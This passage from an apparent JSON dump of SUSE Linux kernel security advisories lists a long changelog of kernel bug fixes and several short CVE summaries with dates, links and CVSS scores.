(bsc#1062279).\n - arm: remove duplicate 'const' annotations' (bnc#1012382).\n - asoc: dapm: fix some pointer error handling (bnc#1012382).\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n - audit: log 32-bit socketcalls (bnc#1012382).\n - blacklist 0e7736c6b806 powerpc/powernv: Fix data type for @r in\n pnv_ioda_parse_m64_window()\n - blacklist.conf: fix commit exists twice in upstream, blacklist one of\n them\n - blacklist.conf: stack limit warning isn't triggered on SP3\n - block: genhd: add device_add_disk_with_groups (bsc#1060400).\n - bnx2x: Do not log mc removal needlessly (bsc#1019680 FATE#321692).\n - bnxt_en: Do not setup MAC address in bnxt_hwrm_func_qcaps() (bsc#963575\n FATE#320144).\n - bnxt_en: Free MSIX vectors when unregistering the device from bnxt_re\n (bsc#1020412 FATE#321671).\n - bnxt_re: Do not issue cmd to delete GID for QP1 GID entry before the QP\n is destroyed (bsc#1056596).\n - bnxt_re: Fix compare and swap atomic operands (bsc#1056596).\n - bnxt_re: Fix memory leak in FRMR path (bsc#1056596).\n - bnxt_re: Fix race between the netdev register and unregister events\n (bsc#1037579).\n - bnxt_re: Fix update of qplib_qp.mtu when modified (bsc#1056596).\n - bnxt_re: Free up devices in module_exit path (bsc#1056596).\n - bnxt_re: Remove RTNL lock dependency in bnxt_re_query_port (bsc#1056596).\n - bnxt_re: Stop issuing further cmds to FW once a cmd times out\n (bsc#1056596).\n - brcmfmac: setup passive scan if requested by user-space (bnc#1012382).\n - bridge: netlink: register netdevice before executing changelink\n (bnc#1012382).\n - ceph: avoid panic in create_session_open_msg() if utsname() returns NULL\n (bsc#1061451).\n - ceph: check negative offsets in ceph_llseek() (bsc#1061451).\n - ceph: fix message order check in handle_cap_export() (bsc#1061451).\n - ceph: fix NULL pointer dereference in ceph_flush_snaps() (bsc#1061451).\n - ceph: limit osd read size to CEPH_MSG_MAX_DATA_LEN (bsc#1061451).\n - ceph: limit osd write size (bsc#1061451).\n - ceph: stop on-going cached readdir if mds revokes FILE_SHARED cap\n (bsc#1061451).\n - ceph: validate correctness of some mount options (bsc#1061451).\n - documentation: arm64: pmu: Add Broadcom Vulcan PMU binding (fate#319481).\n - driver-core: platform: Add platform_irq_count() (bsc#1062279).\n - driver core: platform: Do not read past the end of "driver_override"\n buffer (bnc#1012382).\n - drivers: firmware: psci: drop duplicate const from psci_of_match\n (FATE#319482 bnc#1012382).\n - drivers: hv: fcopy: restore correct transfer length (bnc#1012382).\n - drivers/perf: arm_pmu_acpi: avoid perf IRQ init when guest PMU is off\n (bsc#1062279).\n - drivers/perf: arm_pmu_acpi: Release memory obtained by kasprintf\n (bsc#1062279).\n - drivers/perf: arm_pmu: add ACPI framework (bsc#1062279).\n - drivers/perf: arm_pmu: add common attr group fields (bsc#1062279).\n - drivers/perf: arm_pmu: Always consider IRQ0 as an error (bsc#1062279).\n - drivers/perf: arm_pmu: Avoid leaking pmu->irq_affinity on error\n (bsc#1062279).\n - drivers/perf: arm_pmu: avoid NULL dereference when not using devicetree\n (bsc#1062279).\n - drivers/perf: arm-pmu: convert arm_pmu_mutex to spinlock (bsc#1062279).\n - drivers/perf: arm_pmu: Defer the setting of __oprofile_cpu_pmu\n (bsc#1062279).\n - drivers/perf: arm_pmu: define armpmu_init_fn (bsc#1062279).\n - drivers/perf: arm_pmu: expose a cpumask in sysfs (bsc#1062279).\n - drivers/perf: arm_pmu: factor out pmu registration (bsc#1062279).\n - drivers/perf: arm-pmu: Fix handling of SPI lacking "interrupt-affinity"\n property (bsc#1062279).\n - drivers/perf: arm_pmu: Fix NULL pointer dereference during probe\n (bsc#1062279).\n - drivers/perf: arm-pmu: fix RCU usage on pmu resume from low-power\n (bsc#1062279).\n - drivers/perf: arm_pmu: Fix reference count of a device_node in\n of_pmu_irq_cfg (bsc#1062279).\n - drivers/perf: arm_pmu: fold init into alloc (bsc#1062279).\n - drivers/perf: arm_pmu: handle no platform_device (bsc#1062279).\n - drivers/perf: arm-pmu: Handle per-interrupt affinity mask (bsc#1062279).\n - drivers/perf: arm_pmu: implement CPU_PM notifier (bsc#1062279).\n - drivers/perf: arm_pmu: make info messages more verbose (bsc#1062279).\n - drivers/perf: arm_pmu: manage interrupts per-cpu (bsc#1062279).\n - drivers/perf: arm_pmu: move irq request/free into probe (bsc#1062279).\n - drivers/perf: arm_pmu: only use common attr_groups (bsc#1062279).\n - drivers/perf: arm_pmu: remove pointless PMU disabling (bsc#1062279).\n - drivers/perf: arm_pmu: rename irq request/free functions (bsc#1062279).\n - drivers/perf: arm_pmu: Request PMU SPIs with IRQF_PER_CPU (bsc#1062279).\n - drivers/perf: arm_pmu: rework per-cpu allocation (bsc#1062279).\n - drivers/perf: arm_pmu: simplify cpu_pmu_request_irqs() (bsc#1062279).\n - drivers/perf: arm_pmu: split cpu-local irq request/free (bsc#1062279).\n - drivers/perf: arm_pmu: split irq request from enable (bsc#1062279).\n - drivers/perf: arm_pmu: split out platform device probe logic\n (bsc#1062279).\n - drivers/perf: kill armpmu_register (bsc#1062279).\n - drm/amdkfd: fix improper return value on error (bnc#1012382).\n - drm: bridge: add DT bindings for TI ths8135 (bnc#1012382).\n - drm_fourcc: Fix DRM_FORMAT_MOD_LINEAR #define (bnc#1012382).\n - drm/i915/bios: ignore HDMI on port A (bnc#1012382).\n - e1000e: use disable_hardirq() also for MSIX vectors in e1000_netpoll()\n (bsc#1022912 FATE#321246).\n - edac, sb_edac: Assign EDAC memory controller per h/w controller\n (bsc#1061721).\n - edac, sb_edac: Avoid creating SOCK memory controller (bsc#1061721).\n - edac, sb_edac: Bump driver version and do some cleanups (bsc#1061721).\n - edac, sb_edac: Carve out dimm-populating loop (bsc#1061721).\n - edac, sb_edac: Check if ECC enabled when at least one DIMM is present\n (bsc#1061721).\n - edac, sb_edac: Classify memory mirroring modes (bsc#1061721).\n - edac, sb_edac: Classify PCI-IDs by topology (bsc#1061721).\n - edac, sb_edac: Do not create a second memory controller if HA1 is not\n present (bsc#1061721).\n - edac, sb_edac: Do not use "Socket#" in the memory controller name\n (bsc#1061721).\n - edac, sb_edac: Drop NUM_CHANNELS from 8 back to 4 (bsc#1061721).\n - edac, sb_edac: Fix mod_name (bsc#1061721).\n - edac, sb_edac: Get rid of ->show_interleave_mode() (bsc#1061721).\n - edac, sb_edac: Remove double buffering of error records (bsc#1061721).\n - edac, sb_edac: Remove NULL pointer check on array pci_tad (bsc#1061721).\n - edac, skx_edac: Handle systems with segmented PCI busses (bsc#1063102).\n - ext4: do not allow encrypted operations without keys (bnc#1012382).\n - extcon: axp288: Use vbus-valid instead of -present to determine cable\n presence (bnc#1012382).\n - exynos-gsc: Do not swap cb/cr for semi planar formats (bnc#1012382).\n - fix flags ordering (bsc#1034075 comment 131)\n - Fix mpage_writepage() for pages with buffers (bsc#1050471).\n - fix whitespace according to upstream commit\n - fs/epoll: cache leftmost node (bsc#1056427).\n - fs/mpage.c: fix mpage_writepage() for pages with buffers (bsc#1050471).\n Update to version in mainline\n - ftrace: Fix kmemleak in unregister_ftrace_graph (bnc#1012382).\n - gfs2: Fix reference to ERR_PTR in gfs2_glock_iter_next (bnc#1012382).\n - hid: i2c-hid: allocate hid buffers for real worst case (bnc#1012382).\n - hwmon: (gl520sm) Fix overflows and crash seen when writing into limit\n attributes (bnc#1012382).\n - i2c: meson: fix wrong variable usage in meson_i2c_put_data (bnc#1012382).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#1024346\n FATE#321239 bsc#1024373 FATE#321247).\n - i40iw: Add missing memory barriers (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - i40iw: Fix port number for query QP (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - ib/core: Add generic function to extract IB speed from netdev\n (bsc#1056596).\n - ib/core: Add ordered workqueue for RoCE GID management (bsc#1056596).\n - ib/core: Fix for core panic (bsc#1022595 FATE#322350).\n - ib/core: Fix the validations of a multicast LID in attach or detach\n operations (bsc#1022595 FATE#322350).\n - ib/i40iw: Fix error code in i40iw_create_cq() (bsc#969476 FATE#319648\n bsc#969477 FATE#319816).\n - ib/ipoib: Fix deadlock over vlan_mutex (bnc#1012382 bsc#1022595\n FATE#322350).\n - ib/ipoib: Replace list_del of the neigh->list with list_del_init\n (FATE#322350 bnc#1012382 bsc#1022595).\n - ib/ipoib: rtnl_unlock can not come after free_netdev (FATE#322350\n bnc#1012382 bsc#1022595).\n - ib/mlx5: Change logic for dispatching IB events for port state\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - ib/mlx5: Fix cached MR allocation flow (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n - ib/mlx5: Fix Raw Packet QP event handler assignment (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - ibmvnic: Set state UP (bsc#1062962).\n - ib/qib: fix false-postive maybe-uninitialized warning (FATE#321231\n FATE#321473 FATE#322149 FATE#322153 bnc#1012382).\n - igb: re-assign hw address pointer on reset after PCI error (bnc#1012382).\n - iio: ad7793: Fix the serial interface reset (bnc#1012382).\n - iio: adc: axp288: Drop bogus AXP288_ADC_TS_PIN_CTRL register\n modifications (bnc#1012382).\n - iio: adc: hx711: Add DT binding for avia,hx711 (bnc#1012382).\n - iio: adc: mcp320x: Fix oops on module unload (bnc#1012382).\n - iio: adc: mcp320x: Fix readout of negative voltages (bnc#1012382).\n - iio: adc: twl4030: Disable the vusb3v1 rugulator in the error handling\n path of 'twl4030_madc_probe()' (bnc#1012382).\n - iio: adc: twl4030: Fix an error handling path in 'twl4030_madc_probe()'\n (bnc#1012382).\n - iio: ad_sigma_delta: Implement a dedicated reset function (bnc#1012382).\n - iio: core: Return error for failed read_reg (bnc#1012382).\n - iommu/io-pgtable-arm: Check for leaf entry before dereferencing it\n (bnc#1012382).\n - iwlwifi: add workaround to disable wide channels in 5GHz (bnc#1012382).\n - kabi fixup struct nvmet_sq (bsc#1063349).\n - kABI: protect enum fs_flow_table_type (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n - kABI: protect struct mlx5_priv (bsc#1015342 FATE#321688 bsc#1015343\n FATE#321689).\n - kABI: protect struct rm_data_op (kabi).\n - kABI: protect struct sdio_func (kabi).\n - libata: transport: Remove circular dependency at free time (bnc#1012382).\n - libceph: do not allow bidirectional swap of pg-upmap-items (bsc#1061451).\n - lsm: fix smack_inode_removexattr and xattr_getsecurity memleak\n (bnc#1012382).\n - md/raid10: submit bio directly to replacement disk (bnc#1012382).\n - mips: Ensure bss section ends on a long-aligned address (bnc#1012382).\n - mips: Fix minimum alignment requirement of IRQ stack (git-fixes).\n - mips: IRQ Stack: Unwind IRQ stack onto task stack (bnc#1012382).\n - mips: Lantiq: Fix another request_mem_region() return code check\n (bnc#1012382).\n - mips: ralink: Fix incorrect assignment on ralink_soc (bnc#1012382).\n - mlx5: Avoid that mlx5_ib_sg_to_klms() overflows the klms array\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - mm: avoid marking swap cached page as lazyfree (VM Functionality,\n bsc#1061775).\n - mm/backing-dev.c: fix an error handling path in 'cgwb_create()'\n (bnc#1063475).\n - mm,compaction: serialize waitqueue_active() checks (for real)\n (bsc#971975).\n - mmc: sdio: fix alignment issue in struct sdio_func (bnc#1012382).\n - mm: discard memblock data later (bnc#1063460).\n - mm: fix data corruption caused by lazyfree page (VM Functionality,\n bsc#1061775).\n - mm/memblock.c: reversed logic in memblock_discard() (bnc#1063460).\n - mm: meminit: mark init_reserved_page as __meminit (bnc#1063509).\n - mm/memory_hotplug: change pfn_to_section_nr/section_nr_to_pfn macro to\n inline function (bnc#1063501).\n - mm/memory_hotplug: define find_{smallest|biggest}_section_pfn as\n unsigned long (bnc#1063520).\n - net: core: Prevent from dereferencing null pointer when releasing SKB\n (bnc#1012382).\n - netfilter: invoke synchronize_rcu after set the _hook_ to NULL\n (bnc#1012382).\n - netfilter: nfnl_cthelper: fix incorrect helper->expect_class_max\n (bnc#1012382).\n - net/mlx4_core: Enable 4K UAR if SRIOV module parameter is not enabled\n (bsc#966191 FATE#320230 bsc#966186 FATE#320228).\n - net/mlx5: Check device capability for maximum flow counters (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5: Delay events till ib registration ends (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Check for qos capability in dcbnl_initialize (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Do not add/remove 802.1ad rules when changing 802.1Q VLAN\n filter (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix calculated checksum offloads counters (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix dangling page pointer on DMA mapping error (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix DCB_CAP_ATTR_DCBX capability for DCBNL getcap\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix inline header size for small packets (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Print netdev features correctly in error message (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Schedule overflow check work to mlx5e workqueue (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: E-Switch, Unload the representors in the correct order\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5: Fix arm SRQ command for ISSI version 0 (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5: Fix command completion after timeout access invalid structure\n (bsc#966318 FATE#320158 bsc#966316 FATE#320159).\n - net/mlx5: Fix counter list hardware structure (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n - net/mlx5: Remove the flag MLX5_INTERFACE_STATE_SHUTDOWN (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: Skip mlx5_unload_one if mlx5_load_one fails (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net: mvpp2: fix the mac address used when using PPv2.2 (bsc#1032150).\n - net: mvpp2: use {get, put}_cpu() instead of smp_processor_id()\n (bsc#1032150).\n - net/packet: check length in getsockopt() called with PACKET_HDRLEN\n (bnc#1012382).\n - netvsc: Initialize 64-bit stats seqcount (fate#320485).\n - nvme: allow timed-out ios to retry (bsc#1063349).\n - nvme: fix sqhd reference when admin queue connect fails (bsc#1063349).\n - nvme: fix visibility of "uuid" ns attribute (bsc#1060400).\n - nvme: protect against simultaneous shutdown invocations (FATE#319965\n bnc#1012382 bsc#964944).\n - nvme: stop aer posting if controller state not live (bsc#1063349).\n - nvmet: implement valid sqhd values in completions (bsc#1063349).\n - nvmet: synchronize sqhd update (bsc#1063349).\n - nvme: use device_add_disk_with_groups() (bsc#1060400).\n - parisc: perf: Fix potential NULL pointer dereference (bnc#1012382).\n - partitions/efi: Fix integer overflow in GPT size calculation\n (FATE#322379 bnc#1012382 bsc#1020989).\n - perf: arm: acpi: remove cpu hotplug statemachine dependency\n (bsc#1062279).\n - perf: arm: platform: remove cpu hotplug statemachine dependency\n (bsc#1062279).\n - perf: arm: replace irq_get_percpu_devid_partition call (bsc#1062279).\n - perf: arm: temporary workaround for build errors (bsc#1062279).\n - perf: Convert to using %pOF instead of full_name (bsc#1062279).\n - powerpc: Fix unused function warning 'lmb_to_memblock' (FATE#322022).\n - powerpc/pseries: Add pseries hotplug workqueue (FATE#322022).\n - powerpc/pseries: Auto-online hotplugged memory (FATE#322022).\n - powerpc/pseries: Check memory device state before onlining/offlining\n (FATE#322022).\n - powerpc/pseries: Correct possible read beyond dlpar sysfs buffer\n (FATE#322022).\n - powerpc/pseries: Do not attempt to acquire drc during memory hot add for\n assigned lmbs (FATE#322022).\n - powerpc/pseries: Fix build break when MEMORY_HOTREMOVE=n (FATE#322022).\n - powerpc/pseries: fix memory leak in queue_hotplug_event() error path\n (FATE#322022).\n - powerpc/pseries: Implement indexed-count hotplug memory add\n (FATE#322022).\n - powerpc/pseries: Implement indexed-count hotplug memory remove\n (FATE#322022).\n - powerpc/pseries: Introduce memory hotplug READD operation (FATE#322022).\n - powerpc/pseries: Make the acquire/release of the drc for memory a\n seperate step (FATE#322022).\n - powerpc/pseries: Remove call to memblock_add() (FATE#322022).\n - powerpc/pseries: Revert 'Auto-online hotplugged memory' (FATE#322022).\n - powerpc/pseries: Use kernel hotplug queue for PowerVM hotplug events\n (FATE#322022).\n - powerpc/pseries: Use lmb_is_removable() to check removability\n (FATE#322022).\n - powerpc/pseries: Verify CPU does not exist before adding (FATE#322022).\n - rdma: Fix return value check for ib_get_eth_speed() (bsc#1056596).\n - rdma/qedr: Parse VLAN ID correctly and ignore the value of zero\n (bsc#1019695 FATE#321703 bsc#1019699 FATE#321702 bsc#1022604\n FATE#321747).\n - rdma/qedr: Parse vlan priority as sl (bsc#1019695 FATE#321703\n bsc#1019699 FATE#321702 bsc#1022604 FATE#321747).\n - rds: ib: add error handle (bnc#1012382).\n - rds: rdma: Fix the composite message user notification (bnc#1012382).\n - README.BRANCH: Add Michal and Johannes as co-maintainers.\n - Remove superfluous hunk in bigmem backport (bsc#1064436). Refresh\n patches.arch/powerpc-bigmem-16-mm-Add-addr_limit-to-mm_context-and-use-it-t\n .patch.\n - Revert "x86/acpi: Enable MADT APIs to return disabled apicids"\n (bnc#1056230).\n - Revert "x86/acpi: Set persistent cpuid <-> nodeid mapping when booting"\n (bnc#1056230).\n - s390/cpcmd,vmcp: avoid GFP_DMA allocations (bnc#1060249, LTC#159112).\n - s390/qdio: avoid reschedule of outbound tasklet once killed\n (bnc#1060249, LTC#159885).\n - s390/topology: alternative topology for topology-less machines\n (bnc#1060249, LTC#159177).\n - s390/topology: always use s390 specific sched_domain_topology_level\n (bnc#1060249, LTC#159177).\n - s390/topology: enable / disable topology dynamically (bnc#1060249,\n LTC#159177).\n - sched/cpuset/pm: Fix cpuset vs. suspend-resume bugs (bnc#1012382).\n - scsi: fixup kernel warning during rmmod() (bsc#1052360).\n - scsi: libfc: fix a deadlock in fc_rport_work (bsc#1063695).\n - scsi: lpfc: Ensure io aborts interlocked with the target (bsc#1056587).\n - scsi: qedi: off by one in qedi_get_cmd_from_tid() (bsc#1004527,\n FATE#321744).\n - scsi: qla2xxx: Fix uninitialized work element (bsc#1019675,FATE#321701).\n - scsi: scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n - scsi: scsi_transport_fc: set scsi_target_id upon rescan (bsc#1058135).\n - scsi: sd: Do not override max_sectors_kb sysfs setting (bsc#1025461).\n - scsi: sd: Remove LBPRZ dependency for discards (bsc#1060985). This patch\n is originally part of a larger series which can't be easily backported\n to SLE-12. For a reasoning why we think it's safe to apply, see\n bsc#1060985, comment 20.\n - scsi: sg: close race condition in sg_remove_sfp_usercontext()\n (bsc#1064206).\n - scsi: sg: do not return bogus Sg_requests (bsc#1064206).\n - scsi: sg: only check for dxfer_len greater than 256M (bsc#1064206).\n - sh_eth: use correct name for ECMR_MPDE bit (bnc#1012382).\n - staging: iio: ad7192: Fix - use the dedicated reset function avoiding\n dma from stack (bnc#1012382).\n - stm class: Fix a use-after-free (bnc#1012382).\n - supported.conf: enable dw_mmc-rockchip driver References: bsc#1064064\n - team: call netdev_change_features out of team lock (bsc#1055567).\n - team: fix memory leaks (bnc#1012382).\n - ttpci: address stringop overflow warning (bnc#1012382).\n - tty: goldfish: Fix a parameter of a call to free_irq (bnc#1012382).\n - usb: chipidea: vbus event may exist before starting gadget (bnc#1012382).\n - usb: core: harden cdc_parse_cdc_header (bnc#1012382).\n - usb: devio: Do not corrupt user memory (bnc#1012382).\n - usb: dummy-hcd: fix connection failures (wrong speed) (bnc#1012382).\n - usb: dummy-hcd: Fix erroneous synchronization change (bnc#1012382).\n - usb: dummy-hcd: fix infinite-loop resubmission bug (bnc#1012382).\n - usb: fix out-of-bounds in usb_set_configuration (bnc#1012382).\n - usb: gadgetfs: fix copy_to_user while holding spinlock (bnc#1012382).\n - usb: gadgetfs: Fix crash caused by inadequate synchronization\n (bnc#1012382).\n - usb: gadget: inode.c: fix unbalanced spin_lock in ep0_write\n (bnc#1012382).\n - usb: gadget: mass_storage: set msg_registered after msg registered\n (bnc#1012382).\n - usb: gadget: udc: atmel: set vbus irqflags explicitly (bnc#1012382).\n - usb: g_mass_storage: Fix deadlock when driver is unbound (bnc#1012382).\n - usb: Increase quirk delay for USB devices (bnc#1012382).\n - usb: pci-quirks.c: Corrected timeout values used in handshake\n (bnc#1012382).\n - usb: plusb: Add support for PL-27A1 (bnc#1012382).\n - usb: renesas_usbhs: fix the BCLR setting condition for non-DCP pipe\n (bnc#1012382).\n - usb: renesas_usbhs: fix usbhsf_fifo_clear() for RX direction\n (bnc#1012382).\n - usb: serial: mos7720: fix control-message error handling (bnc#1012382).\n - usb: serial: mos7840: fix control-message error handling (bnc#1012382).\n - usb-storage: unusual_devs entry to fix write-access regression for\n Seagate external drives (bnc#1012382).\n - usb: uas: fix bug in handling of alternate settings (bnc#1012382).\n - uwb: ensure that endpoint is interrupt (bnc#1012382).\n - uwb: properly check kthread_run return value (bnc#1012382).\n - x86/acpi: Restore the order of CPU IDs (bnc#1056230).\n - x86/cpu: Remove unused and undefined __generic_processor_info()\n declaration (bnc#1056230).\n - x86 edac, sb_edac.c: Take account of channel hashing when needed\n (bsc#1061721).\n - x86/mshyperv: Remove excess #includes from mshyperv.h (fate#320485).\n - xfs: handle error if xfs_btree_get_bufs fails (bsc#1059863).\n - xfs: remove kmem_zalloc_greedy (bnc#1012382).\n - xhci: fix finding correct bus_state structure for USB 3.1 hosts\n (bnc#1012382).\n\n", "modified": "2017-10-25T15:07:20", "published": "2017-10-25T15:07:20", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00072.html", "id": "OPENSUSE-SU-2017:2846-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-11T23:07:07", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.61 to the\n following security updates:\n\n - CVE-2017-1000111: fix race condition in net-packet code that could be\n exploited to cause out-of-bounds memory access (bsc#1052365).\n - CVE-2017-1000112: fix race condition in net-packet code that could have\n been exploited by unprivileged users to gain root access. (bsc#1052311).\n\n", "modified": "2017-08-11T21:07:51", "published": "2017-08-11T21:07:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00040.html", "id": "SUSE-SU-2017:2142-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-08-11T09:07:16", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.74 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000111: fix race condition in net-packet code that could be\n exploited to cause out-of-bounds memory access (bsc#1052365).\n - CVE-2017-1000112: fix race condition in net-packet code that could have\n been exploited by unprivileged users to gain root access. (bsc#1052311).\n\n The following non-security bugs were fixed:\n\n - powerpc/numa: fix regression that could cause kernel panics during\n installation (bsc#1048914).\n - bcache: force trigger gc (bsc#1038078).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n\n", "modified": "2017-08-11T06:07:36", "published": "2017-08-11T06:07:36", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00039.html", "id": "SUSE-SU-2017:2131-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-08-12T03:07:14", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to 3.12.74 to the\n following security updates:\n\n - CVE-2017-1000111: fix race condition in net-packet code that could be\n exploited to cause out-of-bounds memory access (bsc#1052365).\n - CVE-2017-1000112: fix race condition in net-packet code that could have\n been exploited by unprivileged users to gain root access. (bsc#1052311).\n\n", "modified": "2017-08-12T00:08:29", "published": "2017-08-12T00:08:29", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00041.html", "id": "SUSE-SU-2017:2150-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.61-52_106 fixes several issues.\n\n The following security issue was fixed:\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bsc#1064388)\n\n", "modified": "2017-12-14T21:11:47", "published": "2017-12-14T21:11:47", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00059.html", "id": "SUSE-SU-2017:3315-1", "title": "Security update for the Linux Kernel (Live Patch 29 for SLE 12) (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-28T21:20:54", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.61-52_119 fixes several issues.\n\n The following security issue was fixed:\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bsc#1064392)\n\n", "modified": "2018-02-28T18:08:51", "published": "2018-02-28T18:08:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00048.html", "id": "SUSE-SU-2018:0562-1", "title": "Security update for the Linux Kernel (Live Patch 31 for SLE 12) (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T21:34:10", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.61-52_122 fixes several issues.\n\n The following security issue was fixed:\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bsc#1064392)\n\n", "modified": "2018-03-12T18:09:52", "published": "2018-03-12T18:09:52", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00033.html", "id": "SUSE-SU-2018:0664-1", "type": "suse", "title": "Security update for the Linux Kernel (Live Patch 32 for SLE 12) (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-01T01:22:40", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 11 SP4 Realtime kernel was updated to receive\n various security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-15274: security/keys/keyctl.c in the Linux kernel did not\n consider the case of a NULL payload in conjunction with a nonzero length\n value, which allowed local users to cause a denial of service (NULL\n pointer dereference and OOPS) via a crafted add_key or keyctl system\n call, a different vulnerability than CVE-2017-12192 (bnc#1045327).\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-1000253: Setuid root PIE binaries could still be exploited to\n gain local root access due missing overlapping memory checking in the\n ELF loader in the Linux Kernel. (bnc#1059525).\n\n The following non-security bugs were fixed:\n\n - blacklist.conf: blacklist bfedb589252c ("mm: Add a user_ns owner to\n mm_struct and fix ptrace permission checks") (bnc#1044228)\n - bnx2x: prevent crash when accessing PTP with interface down\n (bsc#1060665).\n - drm/mgag200: Fixes for G200eH3. (bnc#1062842)\n - fs/binfmt_elf.c:load_elf_binary(): return -EINVAL on zero-length\n mappings (bnc#1059525).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#909484\n FATE#317397).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - lustre: Fix "getcwd: Close race with d_move called by lustre" for -rt\n Convert added spin_lock/unlock() of ->d_lock to seqlock variants.\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061180).\n - netback: coalesce (guest) RX SKBs as needed (bsc#1056504).\n - nfs: Remove asserts from the NFS XDR code (bsc#1063544).\n - powerpc: Fix the corrupt r3 error during MCE handling (bnc#1056230).\n - powerpc: Make sure IPI handlers see data written by IPI senders\n (bnc#1056230).\n - powerpc/xics: Harden xics hypervisor backend (bnc#1056230).\n - s390/cpcmd,vmcp: avoid GFP_DMA allocations (bnc#1060245, 